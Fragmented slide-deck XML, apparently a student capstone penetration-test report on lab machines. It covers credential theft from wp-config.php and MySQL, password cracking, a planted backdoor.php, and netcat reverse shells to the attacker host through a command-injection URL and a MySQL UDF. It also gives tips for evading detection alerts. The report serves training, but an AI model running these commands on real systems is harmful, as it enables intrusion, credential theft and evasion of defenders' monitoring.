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13716000" cx="2437765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Amatic SC"/>
      <p:regular r:id="rId43"/>
      <p:bold r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
      <p:italic r:id="rId57"/>
      <p:boldItalic r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue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BBB976-D877-48E8-8CB2-E99944E27883}">
  <a:tblStyle styleId="{5EBBB976-D877-48E8-8CB2-E99944E278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Inconsolata-bold.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata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Poppins-bold.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppi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62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-bold.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-italic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RobotoLight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font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight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LatoLight-italic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-boldItalic.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-italic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-bold.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium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11ddfe1d67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11ddfe1d67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g11ddfe1d67e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11a709de43f_2_12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11a709de43f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11a709de43f_2_1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11a709de43f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11a709de43f_2_1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11a709de43f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11a709de43f_2_15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11a709de43f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Ran ps aux | grep root to discover mysql running under context of root.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Searched for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> escalation exploits with mysql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Followed exploit-db directions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8bd883d690_0_2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8bd883d6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32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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28.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image158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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200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6.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204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3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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0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7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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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65.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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80.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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84.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82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3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102.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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09.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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09.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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09.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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09.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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6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7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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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5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4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5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image221.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image234.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploitation: SQL Database and Passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2402" name="Google Shape;2402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3" name="Google Shape;2403;p14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-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>once navigating to /var/www/html, was </a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:rPr>
              <a:t>able to view the wp-config.php file with </a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:rPr>
              <a:t>passwords in plain text.  </a:t>
            </a:r>
            <a:endParaRPr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-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In mysql database, we were able to</a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:rPr>
              <a:t>    retrieved user credentials from wp_user</a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:rPr>
              <a:t>    by using the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:rPr>
              <a:t>    select * from wp_user;</a:t>
            </a:r>
            <a:endParaRPr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-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From the results, we were able to get the</a:t>
            </a:r>
            <a:endParaRPr sz="4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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password hash for all users.</a:t>
            </a:r>
            <a:endParaRPr sz="41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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2404" name="Google Shape;240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650" y="2993045"/>
            <a:ext cx="10764050" cy="22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5" name="Google Shape;2405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0650" y="8690125"/>
            <a:ext cx="11284774" cy="16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5076" y="7072825"/>
            <a:ext cx="11284776" cy="14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Target 1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Weak Password and Root access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2413" name="Google Shape;2413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4" name="Google Shape;2414;p1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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33" y="202844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88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-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used john to crack steven’s password hash.  </a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-4889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-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used command sudo -l to discover that steven had sudo access to python commands</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-4889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100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ran python script to gain root access</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2416" name="Google Shape;241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3200" y="4704700"/>
            <a:ext cx="8233925" cy="56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500" y="4704700"/>
            <a:ext cx="11582875" cy="2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500" y="8052951"/>
            <a:ext cx="9700300" cy="22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2 - Exploitation: Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2424" name="Google Shape;2424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5" name="Google Shape;2425;p147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1907150"/>
            <a:ext cx="22942800" cy="10254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Running  command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gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u 192.168.1.115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It provide us list of directories that are being exposed to the public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26" name="Google Shape;242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650" y="5953561"/>
            <a:ext cx="12077624" cy="52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0050" y="5953550"/>
            <a:ext cx="7379926" cy="26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2 - Exploitation: Local File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2433" name="Google Shape;2433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4" name="Google Shape;2434;p148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1907150"/>
            <a:ext cx="22942800" cy="10254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Running  a shell script that injects a backdoor.php file that allows command injection.  We leverage local file inclusion vulnerability in contact.php.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With this backdoor.php in place, we were able inject any Linux command into the server.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35" name="Google Shape;243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933" y="5605700"/>
            <a:ext cx="17506501" cy="67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2 - Exploitation: Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2441" name="Google Shape;2441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2" name="Google Shape;2442;p149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1907150"/>
            <a:ext cx="22942800" cy="10254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With backdoor.php in place, we can setup a listener on our Kali machine to spawn a reverse shell.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nc -lvnt 4444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 setup the reverse shell, we use the following command injection URL in the browser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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash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443" name="Google Shape;244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077" y="7010225"/>
            <a:ext cx="10951149" cy="22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075" y="9576450"/>
            <a:ext cx="10135961" cy="14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28300" y="9576450"/>
            <a:ext cx="11103076" cy="14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Target 2 - Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library</a:t>
            </a:r>
            <a:endParaRPr sz="4300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2451" name="Google Shape;2451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2" name="Google Shape;2452;p150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1907150"/>
            <a:ext cx="22942800" cy="10254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With database credential exposed and noticing mysql services are running in the context of root,  we were able to use UDF vulnerability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to root.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We created a system function in mysql to spawn a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shell to gain root privileges.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while we have the listener on our Kali: nc -lvnp 8887)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execute the sql query to spawn reverse shell: select do_system(‘nc 192.168.1.90 8887 -e /bin/bash’);  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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/1518</a:t>
            </a:r>
            <a:endParaRPr sz="4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453" name="Google Shape;245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350" y="6895925"/>
            <a:ext cx="13547000" cy="1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075" y="9092800"/>
            <a:ext cx="7838422" cy="1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0125" y="8684109"/>
            <a:ext cx="10086675" cy="4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15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62" name="Google Shape;2462;p15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3" name="Google Shape;2463;p15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Stealth Exploitation of WPScan and gobuster</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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9" name="Google Shape;2469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0" name="Google Shape;2470;p15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Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="31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Which alerts detect this exploit? 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-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN count() GROUPED OVER top 5 'http.response.status_code' IS ABOVE 400 FOR THE LAST 5 minutes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Which metrics do they measure? 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-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.response.status_code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Which thresholds do they fire at?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-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Above 400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Mitigating Detection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How can you execute the same exploit without triggering the alert?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we can change the wpscan detection-mode from mixed to passive to avoid the detection.</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-4000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■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan –url 192.168.1.110 –detection-mode passive –enumerate u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Are there alternative exploits that may perform better?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-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using gobuster to run a smaller subset of wordlist to prevent triggering the alert.</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If possible, include a screenshot of your stealth technique.</a:t>
            </a:r>
            <a:endParaRPr sz="27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2471" name="Google Shape;2471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25" y="9834188"/>
            <a:ext cx="80010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15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of Weak Password/Mysql manipulation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2477" name="Google Shape;2477;p1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8" name="Google Shape;2478;p15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Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="27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2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The alerts that would trigger are the Excessive HTTP errors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and CPU Usage Monitoring alerts.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Which metrics do they measure?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http.request.status_code and system.process.cpu.total.pct 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Which th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resholds do they fire at?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ABOVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>400 FOR THE LAST 5 minutes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ABOVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0.5 FOR THE LAST 5 minutes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</a:rPr>
              <a:t>Mitigating Detection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How can you execute the same exploit without triggering the alert?</a:t>
            </a:r>
            <a:endParaRPr sz="2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We could attempt to guess users’ passwords to prevent excessive amounts of HTTP error codes, as we did in the case of Michael’s password.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</a:rPr>
              <a:t>Are there alternative exploits that may perform better?</a:t>
            </a:r>
            <a:endParaRPr sz="2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We created a hash file on our local computer through John once we had the hash of Steven’s password.</a:t>
            </a:r>
            <a:endParaRPr sz="2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479" name="Google Shape;247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6625" y="3403975"/>
            <a:ext cx="10980201" cy="3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5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Local File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2485" name="Google Shape;2485;p1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6" name="Google Shape;2486;p15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HTTP Request Size Monitor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when sum() of http.request.bytes over all documents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when it is above 3500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create stageless payload to avoid detection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use msfvenom to create payloads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6" name="Google Shape;2336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339" name="Google Shape;2339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6" name="Google Shape;2346;p13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Address Range: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192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 192.168.1.1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IPv4:192.168.1.100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ELK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IPv4:192.168.1.90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Kali Linux 2.6-3.2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Kali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IPv4:192.168.1.110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3.2-4.9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IPv4:192.168.1.115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3.2-4.9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IPv4:192.168.1.105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OS: Linux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Hostname: CapStone(server1)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pic>
        <p:nvPicPr>
          <p:cNvPr id="2354" name="Google Shape;235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550" y="1741250"/>
            <a:ext cx="15988388" cy="1214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60" name="Google Shape;2360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1" name="Google Shape;2361;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="19246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Our assessment uncovered the following critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4200"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
